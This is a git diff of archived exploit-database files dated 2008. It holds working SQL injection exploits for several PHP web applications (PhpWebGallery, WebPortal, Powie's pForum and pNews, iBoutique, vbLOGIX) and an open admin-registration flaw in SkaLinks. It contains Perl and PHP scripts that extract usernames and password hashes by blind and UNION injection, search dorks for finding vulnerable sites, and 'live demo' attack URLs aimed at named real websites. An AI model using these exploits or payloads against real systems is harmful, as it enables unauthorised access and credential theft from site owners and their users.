-			print Ws "pid:$pid\n" or die ;
- 
-            my $url = $p->{'-u'} .
-                ' AND 
-				ascii(substring((SELECT CONCAT(username,0x202f20,password) 
-				FROM phpwebgallery_users
-				LIMIT 0,1),' . $position . ',1))='. $ascii ;
- 
-			my $ua = LWP::UserAgent->new ;
-			$ua->timeout( $p->{'-T'} ) ;
- 
-			my $content ;
-			while( 1 )
-			{
-				last if $content = $ua->get( $url )->content ;
-			}
- 
-            ( $content =~ /$pattern/ ) ? print W "yes $position $ascii\n" : print W "no $position $ascii\n" ;
- 
-            exit( 0 ) ;
-		}
- 
-	}
-}
- 
-sub _IS_VULN
-{
-	my $p = shift ;
-	my $ua = LWP::UserAgent->new ;
-	$ua->timeout( $p->{'-T'} ) ;
- 
-    my ( $one, $two ) = (
-        $ua->get( $p->{'-u'}." AND 1=1")->content ,
-        $ua->get( $p->{'-u'}." AND 1=2")->content ,
-    ) ;
- 
-    return ($one =~ /$pattern/ and $two !~ /$pattern/) ? 1 : undef ;
-
-}
-
-__END__
-
-# milw0rm.com [2008-09-12]
+#!/usr/bin/perl -W
+ 
+#
+# PhpWebGallery 1.3.4 Blind SQL Injection Exploit
+# Download: http://puzzle.dl.sourceforge.net/sourceforge/phpwebgallery/phpwebgallery-1.3.4.tar.bz2
+# File affected: picture.php
+#
+# exploit written by ka0x 
+# D.O.M Labs - Security Researchers
+# - www.domlabs.org -
+#
+# ka0x@domlabs:~/codes$ ./phpwebgallery.pl -u "http://localhost/gallery/picture.php?cat=1&image_id=1"
+# [i] Getting default: -T 30
+# [i] Getting default: -l 200
+# [i] Getting default: -t 15
+# 21 118 v
+# [!] $EXIT_IF_NO_CHAR : I can't find a valid character, position 18.
+# [i] USER / PASSWORD:
+# admin / php_gallery_
+#
+#
+ 
+
+my $MAX_FIELD_LENGTH = 200 ;
+my $EXIT_IF_NO_CHAR = 1 ;
+my $DEFAULT_THREADS = 15 ;
+my $DEFAULT_THREADS_TIMEOUT = 30 ;
+my @ascii = ( 32 .. 123 ) ;
+my $DEFAULT_THREADS_TIME = 1 ;
+my $pattern = 'Powered'; 
+
+ 
+use LWP::UserAgent ;
+ 
+sub _HELP_AND_EXIT
+{
+    die "
+ 
+  ./$0 -u 
+ 
+ Options:
+  -u                   Ex: http://localhost/picture.php?cat=1&image_id=1
+ 
+ Other:
+  -t    <#>                 Threads, default '$DEFAULT_THREADS'.
+  -l    <#>                 Maximum table name length '$MAX_FIELD_LENGTH'.
+  -T    <#>                 Timeout.
+  -h                        Help (also with --help).
+ 
+  Example:
+ 
+  ./$0 -u \"http://localhost/gallery/picture.php?cat=1&image_id=1\"
+ 
+" ;
+}
+ 
+ 
+my ($p, $w) = ({ @ARGV }, { }) ;
+ 
+map {
+	&_HELP_AND_EXIT if $_ eq '--help' or $_ eq '-h' ;
+} keys %$p ;
+ 
+map {
+	die "[!] Require: $_\n[!] Help: ./$0 --help\n" unless $p->{ $_ } ;
+} qw/-u/ ;
+ 
+$p->{'-t'} = ( $p->{'-t'} and $p->{'-t'} =~ /^\d+$/ ) ? $p->{'-t'} : ( $w->{'-t'} = $DEFAULT_THREADS ) ;
+$p->{'-l'} = ( $p->{'-l'} and $p->{'-l'} =~ /^\d+$/ ) ? $p->{'-l'} : ( $w->{'-l'} = $MAX_FIELD_LENGTH ) ;
+$p->{'-T'} = ( $p->{'-T'} and $p->{'-T'} =~ /^\d+$/ ) ? $p->{'-T'} : ( $w->{'-T'} = $DEFAULT_THREADS_TIMEOUT ) ;
+ 
+map {
+	warn "[i] Getting default: $_ $w->{ $_ }\n" ;
+} sort keys %$w ;
+ 
+( &_IS_VULN( $p ) ) ? &_START_WORK( $p ) : die "[i] Bad pattern ? Isn't vulnerable ?\n" ;
+ 
+ 
+
+sub _START_WORK
+{
+	my $p = shift ;
+	my $position = 1 ;
+
+	pipe(R, W) ;
+	pipe(Rs, Ws) ;
+	autoflush STDOUT 1 ;
+ 
+	my $sql_message = '' ;
+	my $msg = '' ;
+	my @pid ;
+ 
+	while( $position <= $p->{'-l'} )
+    {
+		my $cf ;
+		unless( $cf = fork ){ &_CHECKING( $p, $position ) ; exit(0) ; }
+		push(@pid, $cf) ;
+ 
+		my $count = 0 ;
+		my $can_exit ;
+		my $char_printed ;
+ 
+        while()
+        {
+			chomp ;
+			push(@pid, (split(/:/))[1] ) if /^pid/ ;
+ 
+			my ($res, $pos, $ascii) = ( split(/ /, $_) ) ;
+			$count++ if $pos == $position ;
+
+			print "\b" x length($msg), ($msg = "$position $ascii " . chr($ascii) ) ;
+ 
+			if( $res eq 'yes' and $pos == $position ){
+				$char_printed = $can_exit = 1 ;
+				print Ws "STOP $position\n" ;
+				$sql_message .= chr( $ascii ) ;
+			}
+ 
+            last if ( $can_exit or $count == @ascii );
+		}
+ 
+        map { 
+			waitpid($_, 0) 
+		} @pid ;
+ 
+		unless( $char_printed )
+        {
+			if( $EXIT_IF_NO_CHAR )
+            {
+				warn "\n[!] \$EXIT_IF_NO_CHAR : I can't find a valid character, position $position.\n"  ;
+				last ;
+ 			}
+		}
+		$position++ ;
+    }
+
+    print "[i] USER / PASSWORD:\n$sql_message\n" ;
+
+}
+ 
+sub _CHECKING
+{
+	my ($p, $position) = @_ ;
+	my $counter = 0 ;
+ 
+    foreach my $ascii ( @ascii )
+    {
+		$counter++ ;
+ 
+		if( $counter % $p->{'-t'} == 0 )
+        {
+			my $stop_position ;
+			eval
+			{
+				$SIG{'ALRM'} = sub { 
+					die "non_stop\n" 
+				} ;
+
+				alarm $DEFAULT_THREADS_TIME ;
+				my $line =  ;
+				$stop_position = (split( / /, $line))[1] ;
+				alarm 0 ;
+			} ;
+ 
+			if( ($stop_position) and $stop_position == $position ){ 
+				print "\nnext position\n" ; 
+				exit(0) ; 
+			}
+		}
+ 
+        unless(my $pid = fork )
+        {
+			print Ws "pid:$pid\n" or die ;
+ 
+            my $url = $p->{'-u'} .
+                ' AND 
+				ascii(substring((SELECT CONCAT(username,0x202f20,password) 
+				FROM phpwebgallery_users
+				LIMIT 0,1),' . $position . ',1))='. $ascii ;
+ 
+			my $ua = LWP::UserAgent->new ;
+			$ua->timeout( $p->{'-T'} ) ;
+ 
+			my $content ;
+			while( 1 )
+			{
+				last if $content = $ua->get( $url )->content ;
+			}
+ 
+            ( $content =~ /$pattern/ ) ? print W "yes $position $ascii\n" : print W "no $position $ascii\n" ;
+ 
+            exit( 0 ) ;
+		}
+ 
+	}
+}
+ 
+sub _IS_VULN
+{
+	my $p = shift ;
+	my $ua = LWP::UserAgent->new ;
+	$ua->timeout( $p->{'-T'} ) ;
+ 
+    my ( $one, $two ) = (
+        $ua->get( $p->{'-u'}." AND 1=1")->content ,
+        $ua->get( $p->{'-u'}." AND 1=2")->content ,
+    ) ;
+ 
+    return ($one =~ /$pattern/ and $two !~ /$pattern/) ? 1 : undef ;
+
+}
+
+__END__
+
+# milw0rm.com [2008-09-12]
diff --git a/platforms/php/webapps/6442.txt b/platforms/php/webapps/6442.txt
index 5da12c271..be6713250 100755
--- a/platforms/php/webapps/6442.txt
+++ b/platforms/php/webapps/6442.txt
@@ -1,34 +1,34 @@
-#=====================================================================================================
-#Powie's PHP Forum <= v1.30 (showprofil) Remote SQL Injection Exploit
-#=====================================================================================================
-#
-#Critical Level : Dangerous
-#
-#Venedor site : http://www.powie.de
-#
-#Version : v1.30
-#
-#=====================================================================================================
-#
-#DORK : "pForum 1.30"
-#
-#
-#Exploit :
-#--------------------------------
-#
-#FOR USER: showprofil.php?id=1+LIMIT+1,1+UNION+SELECT+concat_ws(0x3a,username)+FROM+pfuser+limit+1,1--
-#FOR PASS: showprofil.php?id=1+LIMIT+1,1+UNION+SELECT+concat_ws(0x3a,pwd)+FROM+pfuser+limit+1,1--
-#FOR MAIL: showprofil.php?id=1+LIMIT+1,1+UNION+SELECT+concat_ws(0x3a,emai)+FROM+pfuser+limit+1,1--
-#
-#=====================================================================================================
-#Discoverd By : -tmh-
-#
-#Contact : tmh[at]sys-flaw.com
-#
-#Greetz To : n00bor , Five-Three-Nine , J0hn.X3r , electron1x , meckl, Floo , -Patrick_B ,
-#	           Loader007 , bizzit , Sys-Flaw , Codesoft , Free-Hack  abcdef ,
-#
-#
-#=====================================================================================================
-
-# milw0rm.com [2008-09-12]
+#=====================================================================================================
+#Powie's PHP Forum <= v1.30 (showprofil) Remote SQL Injection Exploit
+#=====================================================================================================
+#
+#Critical Level : Dangerous
+#
+#Venedor site : http://www.powie.de
+#
+#Version : v1.30
+#
+#=====================================================================================================
+#
+#DORK : "pForum 1.30"
+#
+#
+#Exploit :
+#--------------------------------
+#
+#FOR USER: showprofil.php?id=1+LIMIT+1,1+UNION+SELECT+concat_ws(0x3a,username)+FROM+pfuser+limit+1,1--
+#FOR PASS: showprofil.php?id=1+LIMIT+1,1+UNION+SELECT+concat_ws(0x3a,pwd)+FROM+pfuser+limit+1,1--
+#FOR MAIL: showprofil.php?id=1+LIMIT+1,1+UNION+SELECT+concat_ws(0x3a,emai)+FROM+pfuser+limit+1,1--
+#
+#=====================================================================================================
+#Discoverd By : -tmh-
+#
+#Contact : tmh[at]sys-flaw.com
+#
+#Greetz To : n00bor , Five-Three-Nine , J0hn.X3r , electron1x , meckl, Floo , -Patrick_B ,
+#	           Loader007 , bizzit , Sys-Flaw , Codesoft , Free-Hack  abcdef ,
+#
+#
+#=====================================================================================================
+
+# milw0rm.com [2008-09-12]
diff --git a/platforms/php/webapps/6443.pl b/platforms/php/webapps/6443.pl
index aa128d9e3..c329fc967 100755
--- a/platforms/php/webapps/6443.pl
+++ b/platforms/php/webapps/6443.pl
@@ -1,48 +1,48 @@
-#!/usr/bin/perl
-# --==+============================================================================+==--
-# --==+            WebPortal <= 0.7.4 Remote SQL Injection Exploit                 +==--    
-# --==+============================================================================+==--
-# 
-#  [*] Discovered By: StAkeR ~ StAkeR@hotmail.it
-#  [+] Discovered On: 12 Sep 2008
-#  [+] Download: http://webportal.ivanoculmine.com/download.php?mid=14
-#  
-#  [*] SQL Injection
-#  [+] download.php?aid=1'+union+select+pass,0,0,0,0+from+portal_users+where+id='1
-#  [+] get file "download.php" and you can read 
-#  
-#  [*] Exploit:
-#  
- # ----------------------------------------------------------
- # WebPortal <= 0.7.4 Remote SQL Injection Exploit 
- # Author: StAkeR - StAkeR[at]hotmail[dot]it
- # ----------------------------------------------------------
- # Usage: perl http://localhost/cms 
- # ----------------------------------------------------------
-
- use strict;
- use LWP::Simple;
-
-
- my $domain = shift @ARGV or banner();
- my $injsql = "/download.php?aid=1'+union+select+pass,0,0,0,0+from+portal_users+where+id='1";
-
- if(get($domain.$injsql) =~ /([0-9a-f]{32})/)
- {
-   print "[+] Exploit Succesfull!\n";
-   print "[+] MD5 Password: ${1}\n";
- }
- else
- {
-   print "[!] Exploit Failed!\n";
-   print "[!] Site Not Vulnerable!\n";
- }
-
- sub banner
- {
-   print "[+] WebPortal <= 0.7.4 Remote SQL Injection Exploit\n";
-   print "[+] Usage: ${0} http://[host]\n";
-   return exit;
- }
-
-# milw0rm.com [2008-09-12]
+#!/usr/bin/perl
+# --==+============================================================================+==--
+# --==+            WebPortal <= 0.7.4 Remote SQL Injection Exploit                 +==--    
+# --==+============================================================================+==--
+# 
+#  [*] Discovered By: StAkeR ~ StAkeR@hotmail.it
+#  [+] Discovered On: 12 Sep 2008
+#  [+] Download: http://webportal.ivanoculmine.com/download.php?mid=14
+#  
+#  [*] SQL Injection
+#  [+] download.php?aid=1'+union+select+pass,0,0,0,0+from+portal_users+where+id='1
+#  [+] get file "download.php" and you can read 
+#  
+#  [*] Exploit:
+#  
+ # ----------------------------------------------------------
+ # WebPortal <= 0.7.4 Remote SQL Injection Exploit 
+ # Author: StAkeR - StAkeR[at]hotmail[dot]it
+ # ----------------------------------------------------------
+ # Usage: perl http://localhost/cms 
+ # ----------------------------------------------------------
+
+ use strict;
+ use LWP::Simple;
+
+
+ my $domain = shift @ARGV or banner();
+ my $injsql = "/download.php?aid=1'+union+select+pass,0,0,0,0+from+portal_users+where+id='1";
+
+ if(get($domain.$injsql) =~ /([0-9a-f]{32})/)
+ {
+   print "[+] Exploit Succesfull!\n";
+   print "[+] MD5 Password: ${1}\n";
+ }
+ else
+ {
+   print "[!] Exploit Failed!\n";
+   print "[!] Site Not Vulnerable!\n";
+ }
+
+ sub banner
+ {
+   print "[+] WebPortal <= 0.7.4 Remote SQL Injection Exploit\n";
+   print "[+] Usage: ${0} http://[host]\n";
+   return exit;
+ }
+
+# milw0rm.com [2008-09-12]
diff --git a/platforms/php/webapps/6444.txt b/platforms/php/webapps/6444.txt
index 7a3b6b383..723bba584 100755
--- a/platforms/php/webapps/6444.txt
+++ b/platforms/php/webapps/6444.txt
@@ -1,65 +1,65 @@
-################################################################ 
-#       .___             __          _______       .___        # 
-#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
-#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
-#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
-#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
-#        \/                  \/             \/                 # 
-#                   ___________   ______  _  __                # 
-#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
-#                 \  \___|  | \/\  ___/\     /                 # 
-#                  \___  >__|    \___  >\/\_/                  # 
-#      est.2007        \/            \/   forum.darkc0de.com   # 
-################################################################ 
-# --d3hydr8 - rsauron - baltazar - sinner_01 - C1c4Tr1Z - beenu# 
-#  ---  FeDeReR -  DON - OutLawz - MAGE -JeTFyrE - Bond        #  
-#                   and all darkc0de members                ---# 
-################################################################ 
-# 
-# Author: r45c4l and  h4x0r 
-# 
-# Home  : www.darkc0de.com 
-# 
-# Email : r45c4l@hotmail.com, vaibhavaher@gmail.com
-# 
-# Share the c0de! 
-# 
-################################################################ 
-# 
-# Exploit: iBoutique v4.0 (product&cat) Remote SQL Injection Vulnerability
-#
-# App Name: iBoutique v4.0 
-# 
-# App Home: http://www.netartmedia.net/iboutique/
-# 
-# App Demo: http://www.netartmedia.net/iboutique/demo.html
-#
-#################################################################
-# Dork: Powered by iBoutique v4.0
-# 
-#  
-# POC: 
-# For username :
-#         
-#	http://site.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,username,5,6+from+websiteadmin_admin_users--
-#
-# For password :
-#  	
-#       http://site.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,password,5,6+from+websiteadmin_admin_users--
-#	      
-#
-#
-# Live Demo:  
-#      http://www.wscreator.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,username,5,6+from+websiteadmin_admin_users--
-#
-#      http://www.wscreator.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,password,5,6+from+websiteadmin_admin_users--
-#  
-# 
-#  
-#
-#
-# 
-################################################################ 
-# Vuln Discovered 12th Sep 2008 
-
-# milw0rm.com [2008-09-12]
+################################################################ 
+#       .___             __          _______       .___        # 
+#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
+#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
+#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
+#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
+#        \/                  \/             \/                 # 
+#                   ___________   ______  _  __                # 
+#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
+#                 \  \___|  | \/\  ___/\     /                 # 
+#                  \___  >__|    \___  >\/\_/                  # 
+#      est.2007        \/            \/   forum.darkc0de.com   # 
+################################################################ 
+# --d3hydr8 - rsauron - baltazar - sinner_01 - C1c4Tr1Z - beenu# 
+#  ---  FeDeReR -  DON - OutLawz - MAGE -JeTFyrE - Bond        #  
+#                   and all darkc0de members                ---# 
+################################################################ 
+# 
+# Author: r45c4l and  h4x0r 
+# 
+# Home  : www.darkc0de.com 
+# 
+# Email : r45c4l@hotmail.com, vaibhavaher@gmail.com
+# 
+# Share the c0de! 
+# 
+################################################################ 
+# 
+# Exploit: iBoutique v4.0 (product&cat) Remote SQL Injection Vulnerability
+#
+# App Name: iBoutique v4.0 
+# 
+# App Home: http://www.netartmedia.net/iboutique/
+# 
+# App Demo: http://www.netartmedia.net/iboutique/demo.html
+#
+#################################################################
+# Dork: Powered by iBoutique v4.0
+# 
+#  
+# POC: 
+# For username :
+#         
+#	http://site.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,username,5,6+from+websiteadmin_admin_users--
+#
+# For password :
+#  	
+#       http://site.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,password,5,6+from+websiteadmin_admin_users--
+#	      
+#
+#
+# Live Demo:  
+#      http://www.wscreator.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,username,5,6+from+websiteadmin_admin_users--
+#
+#      http://www.wscreator.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,password,5,6+from+websiteadmin_admin_users--
+#  
+# 
+#  
+#
+#
+# 
+################################################################ 
+# Vuln Discovered 12th Sep 2008 
+
+# milw0rm.com [2008-09-12]
diff --git a/platforms/php/webapps/6445.txt b/platforms/php/webapps/6445.txt
index 5ae90228f..560b08169 100755
--- a/platforms/php/webapps/6445.txt
+++ b/platforms/php/webapps/6445.txt
@@ -1,27 +1,27 @@
-                         ||          ||   | ||       
-                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
-                  ( :   /    (_)    /           (   . 
-
-################################################################
-#           SQL Injection
-#
-#           Found by ::: mr.al7rbi
-#
-#           Contact :::   n16 [at] live.com
-#
-#           my Group :::  mr.al7rbi team
-#
-################################################################
-
-Title:   SkaLinks - Link Exchange Script
-d0rk: 2005. Powered by SkaLinks - Link Exchange Script
-DESCRIPTION:
-add admin
-EXPLOITS:
-http://example.com/admin/register.php
-example:
-http://xxx.dk/partner/admin/register.php
-Special  Greetz for :  tryag.cc/cc
-Greetz : noaf_07 & aloosh  &  ili The General ili & fhad & all tryag members & all muslims
-
-# milw0rm.com [2008-09-12]
+                         ||          ||   | ||       
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
+                  ( :   /    (_)    /           (   . 
+
+################################################################
+#           SQL Injection
+#
+#           Found by ::: mr.al7rbi
+#
+#           Contact :::   n16 [at] live.com
+#
+#           my Group :::  mr.al7rbi team
+#
+################################################################
+
+Title:   SkaLinks - Link Exchange Script
+d0rk: 2005. Powered by SkaLinks - Link Exchange Script
+DESCRIPTION:
+add admin
+EXPLOITS:
+http://example.com/admin/register.php
+example:
+http://xxx.dk/partner/admin/register.php
+Special  Greetz for :  tryag.cc/cc
+Greetz : noaf_07 & aloosh  &  ili The General ili & fhad & all tryag members & all muslims
+
+# milw0rm.com [2008-09-12]
diff --git a/platforms/php/webapps/6446.txt b/platforms/php/webapps/6446.txt
index 1f3ba586f..eaa2a66e2 100755
--- a/platforms/php/webapps/6446.txt
+++ b/platforms/php/webapps/6446.txt
@@ -1,31 +1,31 @@
-#=====================================================================================================
-#vbLOGIX Tutorial Script <= v1.0 (cat_id) Remote SQL Injection Exploit
-#=====================================================================================================
-#
-#
-#Venedor site : http://www.vblogix.com/
-#
-#Demo site: http://www.vb-demo.com/
-#
-#Version : v1.0
-#
-#=====================================================================================================
-#
-#DORK : no have
-#
-#
-#Exploit :
-#--------------------------------
-# main.php?act=list&cat_id=-1+UNION+ALL+SELECT+concat(usrname,0x3a,psswd)+FROM+t_user/*
-#
-#=====================================================================================================
-#Discoverd By : FIREH4CK3R
-#
-#Contact : firehacker_msn[at]hotmail.com
-#
-#Greetz To : FIREH4CK3R, Sh0rtKiller, Park, Dark, SecurityBR
-#
-#
-#=====================================================================================================
-
-# milw0rm.com [2008-09-12]
+#=====================================================================================================
+#vbLOGIX Tutorial Script <= v1.0 (cat_id) Remote SQL Injection Exploit
+#=====================================================================================================
+#
+#
+#Venedor site : http://www.vblogix.com/
+#
+#Demo site: http://www.vb-demo.com/
+#
+#Version : v1.0
+#
+#=====================================================================================================
+#
+#DORK : no have
+#
+#
+#Exploit :
+#--------------------------------
+# main.php?act=list&cat_id=-1+UNION+ALL+SELECT+concat(usrname,0x3a,psswd)+FROM+t_user/*
+#
+#=====================================================================================================
+#Discoverd By : FIREH4CK3R
+#
+#Contact : firehacker_msn[at]hotmail.com
+#
+#Greetz To : FIREH4CK3R, Sh0rtKiller, Park, Dark, SecurityBR
+#
+#
+#=====================================================================================================
+
+# milw0rm.com [2008-09-12]
diff --git a/platforms/php/webapps/6447.txt b/platforms/php/webapps/6447.txt
index 35342ff66..822a5fdfa 100755
--- a/platforms/php/webapps/6447.txt
+++ b/platforms/php/webapps/6447.txt
@@ -1,59 +1,59 @@
-################################################################ 
-#       .___             __          _______       .___        # 
-#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
-#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
-#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
-#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
-#        \/                  \/             \/                 # 
-#                   ___________   ______  _  __                # 
-#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
-#                 \  \___|  | \/\  ___/\     /                 # 
-#                  \___  >__|    \___  >\/\_/                  # 
-#      est.2007        \/            \/   forum.darkc0de.com   # 
-################################################################ 
-# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
-#  ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE                #
-#                   and all darkc0de members                ---# 
-################################################################ 
-# 
-# Author: r45c4l 
-# 
-# Home  : www.darkc0de.com 
-# 
-# Email : r45c4l@hotmail.com 
-# 
-# Share the c0de! 
-# 
-################################################################ 
-# 
-# Title: Powie's pNews v2.03 (newskom.php?newsid=) Remote SQL Injection Exploit
-
-#
-# Vendor:  http://www.powie.de
-
-# 
-#
-###########################################################
-#
-# d0rk:n/a
-#
-###########################################################
- 
-     Exploit:-
-	http://www.site.com/[script]/newskom.php?newsid=-1+union+all+select+1,2,3,4,concat(username,0x3a,pwd,0x3a),6+from+pl_user/*
-
-     
-     
-     Live Demo: 
-	http://www.uni-leipzig.de/fsrpowi/newskom.php?newsid=-1+union+all+select+1,2,3,4,concat(username,0x3a,pwd,0x3a),6+from+pl_user/*
-
-     Admin panel is at http://site.com/script/admin/ 
-
-     The password in in plain text :P	
-
-###########################################################
-#
-#  Bug discovered : 12 Sep.2008
-###########################################################
-
-# milw0rm.com [2008-09-12]
+################################################################ 
+#       .___             __          _______       .___        # 
+#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
+#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
+#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
+#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
+#        \/                  \/             \/                 # 
+#                   ___________   ______  _  __                # 
+#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
+#                 \  \___|  | \/\  ___/\     /                 # 
+#                  \___  >__|    \___  >\/\_/                  # 
+#      est.2007        \/            \/   forum.darkc0de.com   # 
+################################################################ 
+# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
+#  ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE                #
+#                   and all darkc0de members                ---# 
+################################################################ 
+# 
+# Author: r45c4l 
+# 
+# Home  : www.darkc0de.com 
+# 
+# Email : r45c4l@hotmail.com 
+# 
+# Share the c0de! 
+# 
+################################################################ 
+# 
+# Title: Powie's pNews v2.03 (newskom.php?newsid=) Remote SQL Injection Exploit
+
+#
+# Vendor:  http://www.powie.de
+
+# 
+#
+###########################################################
+#
+# d0rk:n/a
+#
+###########################################################
+ 
+     Exploit:-
+	http://www.site.com/[script]/newskom.php?newsid=-1+union+all+select+1,2,3,4,concat(username,0x3a,pwd,0x3a),6+from+pl_user/*
+
+     
+     
+     Live Demo: 
+	http://www.uni-leipzig.de/fsrpowi/newskom.php?newsid=-1+union+all+select+1,2,3,4,concat(username,0x3a,pwd,0x3a),6+from+pl_user/*
+
+     Admin panel is at http://site.com/script/admin/ 
+
+     The password in in plain text :P	
+
+###########################################################
+#
+#  Bug discovered : 12 Sep.2008
+###########################################################
+
+# milw0rm.com [2008-09-12]
diff --git a/platforms/php/webapps/6449.php b/platforms/php/webapps/6449.php
index 1119f0b28..d1e242b98 100755
--- a/platforms/php/webapps/6449.php
+++ b/platforms/php/webapps/6449.php
@@ -1,83 +1,83 @@
- php '.$argv[0].' http://www.site.com/link/linkto.php?id=128 2
-#  Live Demo :
-#   http://www.uni-leipzig.de/fsrpowi/link/linkto.php?id=128 2
-#                                                            
-###############################################################
-');
-if ($argc > 1) {
-$url = $argv[1];
-if ($argc < 3) {
-$userid = 1;
-} else {
-$userid = $argv[2];
-}
-$r = strlen(file_get_contents($url."+and+1=1/*"));
-echo "\nExploiting:\n";
-$w = strlen(file_get_contents($url."+and+1=0/*"));
-$t = abs((100-($w/$r*100)));
-echo "Password: ";
-for ($j = 1; $j <= 32; $j++) {
-   for ($i = 46; $i <= 102; $i=$i+2) {
-      if ($i == 60) {
-         $i = 98;
-      }
-      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+pwd+from+pl_user+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i."/*"));
-      if (abs((100-($laenge/$r*100))) > $t-1) {
-         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+pwd+from+pl_user+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1)."/*"));
-         if (abs((100-($laenge/$r*100))) > $t-1) {
-            echo chr($i-1);
-         } else {
-            echo chr($i);
-         }
-         $i = 102;
-      }
-   }
-}
-echo "\nUsername: ";
-for ($i=1; $i <= 30; $i++) {
-$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+pl_user+where+id=".$userid."+limit+0,1),".$i.",1))!=0/*"));
-   if (abs((100-($laenge/$r*100))) > $t-1) {
-      $count = $i;
-      $i = 30;
-   }
-}
-for ($j = 1; $j < $count; $j++) {
-   for ($i = 46; $i <= 122; $i=$i+2) {
-      if ($i == 60) {
-         $i = 98;
-      }
-      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+pl_user+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i."/*"));
-      if (abs((100-($laenge/$r*100))) > $t-1) {
-         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+pl_user+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1)."/*"));
-         if (abs((100-($laenge/$r*100))) > $t-1) {
-            echo chr($i-1);
-         } else {
-            echo chr($i);
-         }
-         $i = 122;
-      }
-   }
-}
-} else {
-echo "\nExploiting failed: By Stack\n";
-}
-?>
-
-# milw0rm.com [2008-09-13]
+ php '.$argv[0].' http://www.site.com/link/linkto.php?id=128 2
+#  Live Demo :
+#   http://www.uni-leipzig.de/fsrpowi/link/linkto.php?id=128 2
+#                                                            
+###############################################################
+');
+if ($argc > 1) {
+$url = $argv[1];
+if ($argc < 3) {
+$userid = 1;
+} else {
+$userid = $argv[2];
+}
+$r = strlen(file_get_contents($url."+and+1=1/*"));
+echo "\nExploiting:\n";
+$w = strlen(file_get_contents($url."+and+1=0/*"));
+$t = abs((100-($w/$r*100)));
+echo "Password: ";
+for ($j = 1; $j <= 32; $j++) {
+   for ($i = 46; $i <= 102; $i=$i+2) {
+      if ($i == 60) {
+         $i = 98;
+      }
+      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+pwd+from+pl_user+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i."/*"));
+      if (abs((100-($laenge/$r*100))) > $t-1) {
+         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+pwd+from+pl_user+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1)."/*"));
+         if (abs((100-($laenge/$r*100))) > $t-1) {
+            echo chr($i-1);
+         } else {
+            echo chr($i);
+         }
+         $i = 102;
+      }
+   }
+}
+echo "\nUsername: ";
+for ($i=1; $i <= 30; $i++) {
+$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+pl_user+where+id=".$userid."+limit+0,1),".$i.",1))!=0/*"));
+   if (abs((100-($laenge/$r*100))) > $t-1) {
+      $count = $i;
+      $i = 30;
+   }
+}
+for ($j = 1; $j < $count; $j++) {
+   for ($i = 46; $i <= 122; $i=$i+2) {
+      if ($i == 60) {
+         $i = 98;
+      }
+      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+pl_user+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i."/*"));
+      if (abs((100-($laenge/$r*100))) > $t-1) {
+         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+pl_user+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1)."/*"));
+         if (abs((100-($laenge/$r*100))) > $t-1) {
+            echo chr($i-1);
+         } else {
+            echo chr($i);
+         }
+         $i = 122;
+      }
+   }
+}
+} else {
+echo "\nExploiting failed: By Stack\n";
+}
+?>
+
+# milw0rm.com [2008-09-13]
diff --git a/platforms/php/webapps/645.pl b/platforms/php/webapps/645.pl
index d3cb7099d..8976d7594 100755
--- a/platforms/php/webapps/645.pl
+++ b/platforms/php/webapps/645.pl
@@ -164,6 +164,6 @@ print "\n";
 print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";
 print "\n Command: SCAN URL HELP QUIT";
 print "\n\n\n\n\n\n\n\n\n\n\n";
-};
-
